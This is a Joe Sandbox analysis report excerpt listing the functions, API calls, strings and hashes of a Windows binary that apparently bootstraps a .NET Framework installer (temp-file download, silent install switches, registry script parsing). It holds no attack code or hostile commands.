Opcode Fuzzy Hash: 9b49f341b2c4d21b5e45a47f73c39f37c7c68b2ac7f0d8e66cdc5e13c3d45f41
Instruction Fuzzy Hash: 41E04F72921228EBCF14DA98890495AF3ACFB4AF50B154596B504D3111C2B4DE00D7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00F912B1 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0e93182a7a267d1faa66e1b03db62032d01d78cad0af53e83ac8b97f0c5432c
Instruction ID: 5440515fcd660987752487034376d8e2b7f847c39090f14436c300cb5a306eda
Opcode Fuzzy Hash: f0e93182a7a267d1faa66e1b03db62032d01d78cad0af53e83ac8b97f0c5432c
Instruction Fuzzy Hash: 4EE04FB5604648EFDB15DF55C840F55B7F8FB09B64F10466DA422D7B90C735E804CA10

Uniqueness

Uniqueness Score: -1.00%

Function 00F912EC Relevance: 35.3, APIs: 9, Strings: 11, Instructions: 337filesynchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00F912F6
GetTempPathW.KERNEL32(00000104,?,-00000068,000006E4,00F974CF,?,--rerunningWithoutUAC,?,00FB6FB0), ref: 00F9149F
GetTempFileNameW.KERNEL32(?,NDP,00000000,?), ref: 00F914D6
_wcsrchr.LIBVCRUNTIME ref: 00F91517
MoveFileW.KERNEL32(?,?), ref: 00F9154F
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F916AB
GetExitCodeProcess.KERNEL32(?,?), ref: 00F916BE
CloseHandle.KERNEL32(?), ref: 00F91721
DeleteFileW.KERNEL32(00000000), ref: 00F91738

Strings

NDP, xrefs: 00F914CA
Downloading the .NET Framework installer, xrefs: 00F915A3
Downloading, xrefs: 00F91590
/passive /norestart /showrmui, xrefs: 00F91665
/q /norestart, xrefs: 00F91676
.exe, xrefs: 00F91520
Install, xrefs: 00F91339
<, xrefs: 00F91443
Cancel, xrefs: 00F91343
@, xrefs: 00F91655
open, xrefs: 00F9166C

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: File$Temp$CloseCodeDeleteExitH_prolog3_HandleMoveNameObjectPathProcessSingleWait_wcsrchr
String ID: .exe$/passive /norestart /showrmui$/q /norestart$<$@$Cancel$Downloading$Downloading the .NET Framework installer$Install$NDP$open
API String ID: 1126903545-275809635
Opcode ID: 6a3551a04ff9938d994c4e62469491f5b74ead042d7ccf200cdc326555ea24a7
Instruction ID: c6e59c548806a0e19a4f54c82c72f5fe11eaea3c750af7c52db5a8ea07e9ca2d
Opcode Fuzzy Hash: 6a3551a04ff9938d994c4e62469491f5b74ead042d7ccf200cdc326555ea24a7
Instruction Fuzzy Hash: 45C1B1B1E0022A9BFF20DB64CC89BE977B9BB49710F1401B5E409EB191DB359E94EF50

Uniqueness

Uniqueness Score: -1.00%

Function 00F91050 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(00000000,00000084,FLAGS), ref: 00F9106D
LoadResource.KERNEL32(00000000,00000000), ref: 00F91075

Strings

net462, xrefs: 00F910E0
net471, xrefs: 00F9110A
net451, xrefs: 00F91087
net461, xrefs: 00F910CB
FLAGS, xrefs: 00F91060
net48, xrefs: 00F91134
net46, xrefs: 00F910B6
net47, xrefs: 00F910F5
net452, xrefs: 00F9109E
net472, xrefs: 00F9111F

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: Resource$FindLoad
String ID: FLAGS$net451$net452$net46$net461$net462$net47$net471$net472$net48
API String ID: 2619053042-95551373
Opcode ID: 5b174077e987d6061211b82d2872275e7a5162d037ef0f1c650499bb7ea8d785
Instruction ID: ce177e4a8b59c9b6ca192ab3d4cad1f6a47487b8905532320f39c492d07539b9
Opcode Fuzzy Hash: 5b174077e987d6061211b82d2872275e7a5162d037ef0f1c650499bb7ea8d785
Instruction Fuzzy Hash: D9216060A40206B6FF54F761CD12FFE7A69BF90B50F000075BA02A50D2EBA4AA85B945

Uniqueness

Uniqueness Score: -1.00%

Function 00FA704F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00FA7093

Part of subcall function 00FA6BB6: _free.LIBCMT ref: 00FA6BD3
Part of subcall function 00FA6BB6: _free.LIBCMT ref: 00FA6BE5
Part of subcall function 00FA6BB6: _free.LIBCMT ref: 00FA6BF7
Part of subcall function 00FA6BB6: _free.LIBCMT ref: 00FA6C09
Part of subcall function 00FA6BB6: _free.LIBCMT ref: 00FA6C1B
Part of subcall function 00FA6BB6: _free.LIBCMT ref: 00FA6C2D
Part of subcall function 00FA6BB6: _free.LIBCMT ref: 00FA6C3F
Part of subcall function 00FA6BB6: _free.LIBCMT ref: 00FA6C51
Part of subcall function 00FA6BB6: _free.LIBCMT ref: 00FA6C63
Part of subcall function 00FA6BB6: _free.LIBCMT ref: 00FA6C75
Part of subcall function 00FA6BB6: _free.LIBCMT ref: 00FA6C87
Part of subcall function 00FA6BB6: _free.LIBCMT ref: 00FA6C99
Part of subcall function 00FA6BB6: _free.LIBCMT ref: 00FA6CAB

_free.LIBCMT ref: 00FA7088

Part of subcall function 00FA363A: HeapFree.KERNEL32(00000000,00000000,?,00FA6D47,?,00000000,?,00000000,?,00FA6D6E,?,00000007,?,?,00FA71E8,?), ref: 00FA3650
Part of subcall function 00FA363A: GetLastError.KERNEL32(?,?,00FA6D47,?,00000000,?,00000000,?,00FA6D6E,?,00000007,?,?,00FA71E8,?,?), ref: 00FA3662

_free.LIBCMT ref: 00FA70AA
_free.LIBCMT ref: 00FA70BF
_free.LIBCMT ref: 00FA70CA
_free.LIBCMT ref: 00FA70EC
_free.LIBCMT ref: 00FA70FF
_free.LIBCMT ref: 00FA710D
_free.LIBCMT ref: 00FA7118
_free.LIBCMT ref: 00FA7150
_free.LIBCMT ref: 00FA7157
_free.LIBCMT ref: 00FA7174
_free.LIBCMT ref: 00FA718C

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 4e5f7ce7515ffee1cea0f930fbc07e5266e61f0b39485e4044b9d6732d08e17e
Instruction ID: b3a07cb645b58cbef54d993b6f17dbec166cc8ec3fa93f0c8c5cdac11090c2f3
Opcode Fuzzy Hash: 4e5f7ce7515ffee1cea0f930fbc07e5266e61f0b39485e4044b9d6732d08e17e
Instruction Fuzzy Hash: F0314CB1A08304AFDB21AA39DC45F56B3E9BF12320F148429F449D7352EF75AD80BB24

Uniqueness

Uniqueness Score: -1.00%

Function 00F99568 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 119libraryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00F99572
LoadLibraryExW.KERNEL32(?,00000000,00000060,00FB72B0,Module,?), ref: 00F995BD
LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 00F995D3
FindResourceW.KERNEL32(00000000,?,?), ref: 00F995FE
LoadResource.KERNEL32(00000000,00000000), ref: 00F99616
SizeofResource.KERNEL32(00000000,00000000), ref: 00F99628

Part of subcall function 00F91C76: GetLastError.KERNEL32(00F914AE), ref: 00F91C76

FreeLibrary.KERNEL32(00000000), ref: 00F996EE

Strings

Module_Raw, xrefs: 00F998EF
Module, xrefs: 00F998CF
REGISTRY, xrefs: 00F9991B

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: LibraryLoadResource$ErrorFindFreeH_prolog3_catch_LastSizeof
String ID: Module$Module_Raw$REGISTRY
API String ID: 1818814483-549000027
Opcode ID: 4dc6a107fbc3813e3ee89c80c5450e5e88e24a6816b52f35ad3bf7b5db22d2d1
Instruction ID: 4e08968afd2d63607c73e7ef12e01eb61033bd91d48a874748f963f43f765614
Opcode Fuzzy Hash: 4dc6a107fbc3813e3ee89c80c5450e5e88e24a6816b52f35ad3bf7b5db22d2d1
Instruction Fuzzy Hash: 0941B4F1E042199BEF219F588C84B9D7AB8EF49350F4140ADF609E6242DB744E84EF68

Uniqueness

Uniqueness Score: -1.00%

Function 00F98069 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 258stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00F98070
_wcsstr.LIBVCRUNTIME ref: 00F98145
EnterCriticalSection.KERNEL32(00000011,?,?,?,?,?,00F996E7,00000000,?), ref: 00F98281
lstrcmpiW.KERNEL32(?,?,?,?,?,?,?,00F996E7,00000000,?), ref: 00F9829D
LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,?,?,00F996E7,00000000,?), ref: 00F982C9

Strings

', xrefs: 00F98121
HKCU{Software{Classes, xrefs: 00F98177
HKCR, xrefs: 00F9813F
%, xrefs: 00F98128
}}, xrefs: 00F98205

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: CriticalSection$EnterH_prolog3_Leave_wcsstrlstrcmpi
String ID: }}$%$'$HKCR$HKCU{Software{Classes
API String ID: 2331752857-792530599
Opcode ID: 872f39c629bf2bfcfd8315ddd7c761aefea3804a4573e0850dbbcfb0f2e73343
Instruction ID: 3e1f641a38617ac30165b0dfe361a3371ba7fd80f5708f9be710f1b97f78dab5
Opcode Fuzzy Hash: 872f39c629bf2bfcfd8315ddd7c761aefea3804a4573e0850dbbcfb0f2e73343
Instruction Fuzzy Hash: E2919071D04345DFEF259FB8C894AADBBB4AF06790F244129E846EB291DF319C46EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00F98D78 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 462stringregistryCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,Delete,?,C93D651F,?,00000000,00000000,?,00FAE204,000000FF,?,00F99528,?,00000000,00000000,00000000), ref: 00F98E0F
lstrcmpiW.KERNEL32(?,ForceRemove,?,00000000,00000000,?,00FAE204,000000FF,?,00F99528,?,00000000,00000000,00000000,?), ref: 00F98E20
lstrcmpiW.KERNEL32(?,NoRemove,?,?,00000000,00000000,?,00FAE204,000000FF,?,00F99528,?,00000000,00000000,00000000,?), ref: 00F98EFE
RegCloseKey.ADVAPI32(?,?,?,?), ref: 00F99279

Part of subcall function 00F989B7: lstrcmpiW.KERNEL32(?,00FB7660,00000000,?,00F99233,?,?,?,?), ref: 00F989C5

Part of subcall function 00F989E6: RegCloseKey.ADVAPI32(00000000), ref: 00F98ACB

lstrcmpiW.KERNEL32(?,Val,?,00000000,00000000,?,00FAE204,000000FF,?,00F99528,?,00000000,00000000,00000000,?), ref: 00F98F2C

Part of subcall function 00F91E76: RegCloseKey.ADVAPI32(?,?,00F91E54,?,?,?,?,?,00F91195,80000002,SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full,00020019), ref: 00F91E81

Strings

ForceRemove, xrefs: 00F98E17
Delete, xrefs: 00F98E03
Val, xrefs: 00F98F26
NoRemove, xrefs: 00F98EF8

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: lstrcmpi$Close
String ID: Delete$ForceRemove$NoRemove$Val
API String ID: 1559394795-1781481701
Opcode ID: 414ed7b4b3913be518d576b4537934f992dde387e79901736b85d431d3e8bcfd
Instruction ID: f51b7bd643ed94d804fba335f04a5295d0b88f3ea5e93e43377f96c16e42e01e
Opcode Fuzzy Hash: 414ed7b4b3913be518d576b4537934f992dde387e79901736b85d431d3e8bcfd
Instruction Fuzzy Hash: 36F1FC31D04235ABEF35EFB8CC48AADB3B9AF44350F0141A9A405E3291EB749E85EF51

Uniqueness

Uniqueness Score: -1.00%

Function 00F92641 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(DeploymentTool.exe), ref: 00F92659
lstrlenW.KERNEL32(00FB5110), ref: 00F9266C
_wcsstr.LIBVCRUNTIME ref: 00F92692
_wcsstr.LIBVCRUNTIME ref: 00F926A7
lstrlenW.KERNEL32 ref: 00F926B6
_wcsstr.LIBVCRUNTIME ref: 00F9275D
_wcsstr.LIBVCRUNTIME ref: 00F927DE
lstrlenW.KERNEL32(?,?), ref: 00F927F1

Strings

DeploymentTool.exe, xrefs: 00F92651, 00F9268C, 00F926A1, 00F92757, 00F927D8

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: _wcsstrlstrlen
String ID: DeploymentTool.exe
API String ID: 4267858634-1188192670
Opcode ID: 686fb788fa0c586d2c95a55514e78032d0d892a27388309c5d1456a1156a7c6d
Instruction ID: dc931e69de4e7f21588eacb3dcafcc80055c27a76939245a5487e60c6cf5adf5
Opcode Fuzzy Hash: 686fb788fa0c586d2c95a55514e78032d0d892a27388309c5d1456a1156a7c6d
Instruction Fuzzy Hash: 79517F31E0020AAFEF14DFA9DCC19AEB7B4FF48314B100469D511E7291EB74AA05EF95

Uniqueness

Uniqueness Score: -1.00%

Function 00FA30B8 Relevance: 15.1, APIs: 10, Instructions: 70COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00FA30CE

Part of subcall function 00FA363A: HeapFree.KERNEL32(00000000,00000000,?,00FA6D47,?,00000000,?,00000000,?,00FA6D6E,?,00000007,?,?,00FA71E8,?), ref: 00FA3650
Part of subcall function 00FA363A: GetLastError.KERNEL32(?,?,00FA6D47,?,00000000,?,00000000,?,00FA6D6E,?,00000007,?,?,00FA71E8,?,?), ref: 00FA3662

_free.LIBCMT ref: 00FA30DA
_free.LIBCMT ref: 00FA30E5
_free.LIBCMT ref: 00FA30F0
_free.LIBCMT ref: 00FA30FB
_free.LIBCMT ref: 00FA3106
_free.LIBCMT ref: 00FA3111
_free.LIBCMT ref: 00FA311C
_free.LIBCMT ref: 00FA3127
_free.LIBCMT ref: 00FA3135

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d1e520ce49143cb5c98346954efbfce70abc32088b30bb8333b346f062c185a5
Instruction ID: 17c324b6472bab118cafb458bb2e80177fdfb4c3f41e2883c2e58d72365385c7
Opcode Fuzzy Hash: d1e520ce49143cb5c98346954efbfce70abc32088b30bb8333b346f062c185a5
Instruction Fuzzy Hash: 2A21C7B6900108BFCB42EF94CC51DDE7BB8EF09310F4081A6F5159B261DB35EB45AB80

Uniqueness

Uniqueness Score: -1.00%

Function 00FA61EE Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 00FA6218
_free.LIBCMT ref: 00FA62FB

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: _free_wcschr
String ID:
API String ID: 3422831350-0
Opcode ID: fab99324c7f39cafab5ff24810a8067aa4a40e242b059d5b0ffa2191f0e34ce8
Instruction ID: 13865de8e81ccc9ff87353dee9ef37a013ebdcb8e8cae02541be25b25a23de9b
Opcode Fuzzy Hash: fab99324c7f39cafab5ff24810a8067aa4a40e242b059d5b0ffa2191f0e34ce8
Instruction Fuzzy Hash: 3661BFF2E00305ABDF25EF74CC81A6E77E4AF0B324B58462DFA05D7281EB759941BA50

Uniqueness

Uniqueness Score: -1.00%

Function 00F95DE0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 214filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,?,00000000), ref: 00F95FB9
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F96032
SetFileTime.KERNEL32(?,?,?,?), ref: 00F96071
CloseHandle.KERNEL32(?), ref: 00F96082

Strings

%s%s, xrefs: 00F95F81
:, xrefs: 00F95F3E
%s%s%s, xrefs: 00F95F60

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: File$CloseCreateHandleTimeWrite
String ID: %s%s$%s%s%s$:
API String ID: 3229859547-3034790606
Opcode ID: d08f969a959fd0989a6149337b4591614b36224d40bf5c4eae71d647f91b4eda
Instruction ID: 0d84f8bf58db36950243b2a52f747d1c61a269b0c3d3cca3f44524191f86936a
Opcode Fuzzy Hash: d08f969a959fd0989a6149337b4591614b36224d40bf5c4eae71d647f91b4eda
Instruction Fuzzy Hash: 3671F271604B409BEF31EF64CC89BABB3E5EB84B20F10092EE599C7191DB359948E752

Uniqueness

Uniqueness Score: -1.00%

Function 00F9C200 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00F9C22B
___except_validate_context_record.LIBVCRUNTIME ref: 00F9C233
_ValidateLocalCookies.LIBCMT ref: 00F9C2C1
__IsNonwritableInCurrentImage.LIBCMT ref: 00F9C2EC
_ValidateLocalCookies.LIBCMT ref: 00F9C341

Strings

csm, xrefs: 00F9C2D6

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: f3c95068dcacbadcceb7ee30e89fa0d0d88a2ed9cc257c6f0764b56bf73c9e56
Instruction ID: cabac10374525d5bcbff9a3e512748a913eaea1c109e58f38841027546a7197c
Opcode Fuzzy Hash: f3c95068dcacbadcceb7ee30e89fa0d0d88a2ed9cc257c6f0764b56bf73c9e56
Instruction Fuzzy Hash: 3441D235E002089BEF10EFA8CC80A9EBBB5BF45324F248165E9159B392D735DA15EBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00FA4846 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 00FA48B1
api-ms-, xrefs: 00FA489D

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 480bdc4588c852d716989c5cbf2c9c2ee7e1ec98efbe8fd03badc794c23bf3b2
Instruction ID: 3abed94fbac8d61ebf2d52dd8389ae654844c6e3374a48038c62c535431872c9
Opcode Fuzzy Hash: 480bdc4588c852d716989c5cbf2c9c2ee7e1ec98efbe8fd03badc794c23bf3b2
Instruction Fuzzy Hash: 9A21EBF2E01264A7CB318B65BC41B6B3768AF87774F154220ED05A7291D7B8FD10B6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00FA6D55 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FA6D1D: _free.LIBCMT ref: 00FA6D42

_free.LIBCMT ref: 00FA6DA3

Part of subcall function 00FA363A: HeapFree.KERNEL32(00000000,00000000,?,00FA6D47,?,00000000,?,00000000,?,00FA6D6E,?,00000007,?,?,00FA71E8,?), ref: 00FA3650
Part of subcall function 00FA363A: GetLastError.KERNEL32(?,?,00FA6D47,?,00000000,?,00000000,?,00FA6D6E,?,00000007,?,?,00FA71E8,?,?), ref: 00FA3662

_free.LIBCMT ref: 00FA6DAE
_free.LIBCMT ref: 00FA6DB9
_free.LIBCMT ref: 00FA6E0D
_free.LIBCMT ref: 00FA6E18
_free.LIBCMT ref: 00FA6E23
_free.LIBCMT ref: 00FA6E2E

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2963ffc26b61ef26470c5cc6503304249528645d02ca6a10ee3de8037808b7bd
Instruction ID: 98aad1201df5721cba7c13f7a9e2f1986f4816260fff2b14531405c97e13f350
Opcode Fuzzy Hash: 2963ffc26b61ef26470c5cc6503304249528645d02ca6a10ee3de8037808b7bd
Instruction Fuzzy Hash: 00115EB1A40B44BAD630BBB0CC07FCB779CAF12744F444C15B29AA6252DBBDB604BA50

Uniqueness

Uniqueness Score: -1.00%

Function 00FA9CE5 Relevance: 9.3, APIs: 6, Instructions: 319fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000020,00000000,00000000), ref: 00FA9D2D
__fassign.LIBCMT ref: 00FA9F0C
__fassign.LIBCMT ref: 00FA9F29
WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FA9F71
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00FA9FB1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FAA05D

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
